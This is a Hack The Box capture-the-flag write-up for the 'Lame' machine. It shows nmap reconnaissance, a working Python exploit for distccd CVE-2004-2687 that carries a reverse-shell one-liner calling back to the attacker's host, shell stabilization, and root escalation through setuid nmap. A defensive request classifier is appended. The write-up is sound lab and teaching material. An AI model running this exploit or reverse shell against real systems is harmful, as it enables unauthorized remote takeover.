Initial Reconnaissance
To start, as always, I ran a port scan to learn about the machine: which ports are open, which services run on them and, where possible, their versions, in the hope of spotting some low-hanging fruit.
I first used an nmap scan to probe all ports aggressively, then ran a service scan against the open ports reported by the first scan.
Since the machine appears not to reply to nmap's host-discovery pings, I use the -Pn flag to skip that check (without it, nmap would treat the host as down and scan nothing).
Port scan:

```shell
nmap 10.10.10.3 -p- -T4 -Pn
```

Service scan (`-oN` writes the normal-format output to a file; a bare `-o` is not a valid nmap option):

```shell
nmap 10.10.10.3 -p 21,22,139,445,3632 -A -T4 -oN nmap.scan -Pn
```
The result is the following:

Let's go over the possible attack vectors one by one.
FTP Enumeration (False Lead)
The FTP service on the machine allows anonymous login, but this is of no use to us since the directory is empty.

SMB Enumeration (False Lead)
Using smbclient, I listed the shares, entering `anonymous` at the password prompt:

```shell
smbclient --list //10.10.10.3
```

This, however, was a dead end: the shares contained no files of any use to us.
distccd (Exploitation)
Since I had not heard of distccd before, I did some research on it. It turns out to be a daemon that distributes compilation jobs across machines.
Researching further, I found that the version of distccd running on this machine (revealed by the nmap scan) is vulnerable to remote code execution, tracked as CVE-2004-2687.
After researching a bit I came across this exploit-db post.
The exploit was written for Metasploit, but since many certification exams do not allow the use of Metasploit, I decided to rewrite the code in Python.
Feel free to use the code I have written:

```python
import random
import string
import socket

OWNED_HOST = "YOUR_IP"
OWNED_PORT = 444
TARGET_HOST = "TARGET_IP"
TARGET_PORT = 3632
COMMAND = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"


def dist_cmd(args):
    # Build a distcc job request: DIST header, ARGC argument count, then each
    # argument as ARGV<8 hex digits length><value>. The trailing arguments
    # after "#" are the fixed compiler flags from the original Metasploit module.
    args += ["#", "-c", "main.c", "-o", "main.o"]
    res = "DIST00000001" + "ARGC{:08x}".format(len(args))
    for arg in args:
        res += "ARGV{:08X}{}".format(len(arg), arg)
    return res


def exploit():
    args = ["sh", "-c", COMMAND]
    distcmd = dist_cmd(args)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind((OWNED_HOST, OWNED_PORT))
        sock.connect((TARGET_HOST, TARGET_PORT))
        sock.sendall(distcmd.encode())
        # Follow up with a DOTI (preprocessed source) token carrying 10 random bytes.
        dtag = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
        sock.sendall(f"DOTI0000000A{dtag}\n".encode())


exploit()
```

I open an ncat listener on port 443, run the exploit and boom... we have a shell!
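From the defender's side, the interesting artifact is the request framing itself. The following is an added example, not part of the original writeup: a parser for the distcc job request format the script above constructs (DIST, ARGC, ARGV, DOTI) that flags any job whose program is not a compiler, which is the property a daemon-side check or a network signature for this CVE keys on. The compiler allowlist and the two sample requests are constructed for the example.

```python
# Compilers a build farm would legitimately hand to distccd. Anything else in
# argv[0] (a shell, an interpreter) is the shape of CVE-2004-2687 abuse.
# This allowlist is an assumption for the example, not distcc's own list.
ALLOWED_COMPILERS = {"cc", "gcc", "g++", "c++", "clang", "clang++"}

def _read_token(buf: bytes, pos: int, expected: bytes):
    """Read one distcc token: a 4-byte name followed by 8 hex digits."""
    name = buf[pos:pos + 4]
    if name != expected:
        raise ValueError(f"expected {expected!r} at offset {pos}, got {name!r}")
    digits = buf[pos + 4:pos + 12]
    if len(digits) != 8:
        raise ValueError(f"truncated length field at offset {pos + 4}")
    return int(digits, 16), pos + 12

def parse_distcc_request(buf: bytes) -> dict:
    """Decode the DIST / ARGC / ARGV... / DOTI framing of a distcc job request."""
    version, pos = _read_token(buf, 0, b"DIST")
    argc, pos = _read_token(buf, pos, b"ARGC")
    argv = []
    for _ in range(argc):
        length, pos = _read_token(buf, pos, b"ARGV")
        arg = buf[pos:pos + length]
        if len(arg) != length:
            raise ValueError("ARGV body shorter than its declared length")
        argv.append(arg.decode("utf-8", "replace"))
        pos += length
    source_len, pos = _read_token(buf, pos, b"DOTI")
    return {"version": version, "argv": argv, "source_len": source_len}

def classify_request(buf: bytes) -> str:
    """'ok' for a compiler job, 'suspicious' for any other program, 'malformed' otherwise."""
    try:
        argv = parse_distcc_request(buf)["argv"]
    except ValueError:
        return "malformed"
    if not argv:
        return "suspicious"
    program = argv[0].rsplit("/", 1)[-1]  # tolerate a full path such as /usr/bin/gcc
    return "ok" if program in ALLOWED_COMPILERS else "suspicious"

# Constructed samples: a normal compile job, and a job shaped like the exploit
# above (a shell in argv[0], then the dummy compiler flags that follow the "#").
BENIGN_REQUEST = (b"DIST00000001ARGC00000005ARGV00000003gccARGV00000002-c"
                  b"ARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000000Cint main(){}")
SUSPICIOUS_REQUEST = (b"DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV00000002id"
                      b"ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002-o"
                      b"ARGV00000006main.oDOTI0000000Axxxxxxxxxx")
```

Running `classify_request` over captured distcc traffic (or inside a wrapper in front of the daemon) separates ordinary compile jobs from requests that name a shell, which is exactly what the daemon's own access restrictions are there to prevent.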
Stabilizing my shell
I stabilized my shell with Python by running the following (the variable is `TERM`, not `term`, and conventionally set to lowercase `xterm`):

```shell
python -c 'import pty;pty.spawn("/bin/bash")'
# press ctrl+z to background the reverse shell, then on the local side:
stty raw -echo; fg
# back in the reverse shell:
export TERM=xterm
```

Now we no longer have the unstable raw `ncat` shell.
Post Exploitation Reconnaissance
As usual for Hack The Box machines, the user flag is located under the /home directory in one of the user folders. I won't leak it here so you can actually have some fun yourselves hehehe.
While doing basic enumeration of privilege escalation vectors, I noticed that the nmap binary had its setuid bit set. This means we can run it as if we were the owner of the binary. And the owner is... ROOT!
This looks very promising.

Privilege Escalation (ROOT)
After researching a bit I came across this blog post. Apparently some older versions of nmap have a so-called interactive mode which lets us spawn a shell from within nmap. Since the SUID bit is set, I am assuming we can spawn that shell as the owner of the binary, i.e. root.

And it works! By following the instructions from the blog post I have spawned a shell as root and successfully pwned the box!

![HackTheBox [Lame]](/_next/image?url=%2Fimages%2Flame_k.png&w=3840&q=75)